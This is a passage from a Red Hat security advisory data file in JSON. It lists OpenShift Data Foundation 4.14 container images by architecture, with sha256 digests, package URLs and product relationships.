"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"product_id": "odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"product": {
"name": "odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"product_id": "odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"product_id": "odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"product_id": "odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"product_id": "odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.14.13-3"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"product": {
"name": "odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"product_id": "odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-cli-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"product_id": "odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"product_id": "odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"product_id": "odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"product_id": "odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.14.13-3"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"product_id": "odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.14.13-3"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64"
},
"product_reference": "odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x"
},
"product_reference": "odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le"
},
"product_reference": "odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64"
},
"product_reference": "odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64 as a component of RHODF 4.14 for RHEL 9",
